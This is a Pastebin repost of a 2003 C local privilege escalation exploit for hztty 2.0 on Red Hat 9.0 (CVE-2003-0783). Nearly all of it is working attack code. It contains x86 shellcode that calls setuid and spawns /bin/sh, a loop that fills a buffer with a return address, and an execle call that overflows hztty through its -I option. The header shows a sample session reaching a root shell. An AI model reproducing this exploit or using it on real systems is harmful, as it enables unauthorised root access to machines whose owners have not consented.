Advertisement
FlyFar

hztty 2.0 (RedHat 9.0) - Local Privilege Escalation - CVE-2003-0783

Mar 15th, 2024
611
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C 1.42 KB | Cybersecurity | 0 0
  1. /*  0x333hztty => hztty 2.0 local root exploit
  2.  *
  3.  *
  4.  *  more info : Debian Security Advisory DSA 385-1
  5.  *
  6.  *  *note* I adjusted some part of hztty's code since
  7.  *  there were some errors. hope this will not influence
  8.  *  exploitation :> tested against Red Hat 9.0 :
  9.  *
  10.  * [c0wboy@0x333 c0wboy]$ gcc 0x333hztty.c -o k
  11.  * [c0wboy@0x333 c0wboy]$ ./k
  12.  *
  13.  *  ---  local root exploit for hztty 2.0  ---
  14.  *  ---  coded by c0wboy ~ 0x33  ---
  15.  *
  16.  * sh-2.05b# [./hztty started]  [using /dev/ttyp6]
  17.  * sh-2.05b$ sh-2.05b# uid=0(root) gid=0(root) groups=500(c0wboy)
  18.  * sh-2.05b#
  19.  *
  20.  *  coded by c0wboy
  21.  *
  22.  *  (c) 0x333 Outsiders Security Labs
  23.  *
  24.  */
  25.  
  26. #include <stdio.h>
  27. #include <unistd.h>
  28.  
  29. #define BIN    "./hztty"
  30. #define SIZE   272
  31.  
  32.  
  33. unsigned char shellcode[] =
  34.     "\x31\xdb\x89\xd8\xb0\x17\xcd\x80\x31\xdb\x89\xd8"
  35.     "\xb0\x2e\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68"
  36.     "\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31"
  37.     "\xd2\xb0\x0b\xcd\x80" ;
  38.  
  39. int main()
  40. {
  41.     int i;
  42.     char out[SIZE];
  43.     char *own[] = { shellcode, 0x0 };
  44.  
  45.     int *hztty = (int *)(out);
  46.     int ret = 0xbffffffa - strlen(BIN) - strlen(shellcode);
  47.  
  48.     for (i=0 ; i<SIZE-1 ; i+=4)
  49.         *hztty++ = ret;
  50.  
  51.     hztty = 0x0;
  52.  
  53.     fprintf (stdout, "\n ---  local root exploit for hztty 2.0  ---\n");
  54.     fprintf (stdout, " ---  coded by c0wboy ~ www.0x333.org   ---\n\n");
  55.  
  56.     execle (BIN, BIN, "-I", out, 0x0, own, 0x0);
  57. }
  58.  
  59.  
  60. // milw0rm.com [2003-09-21]
  61.            
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement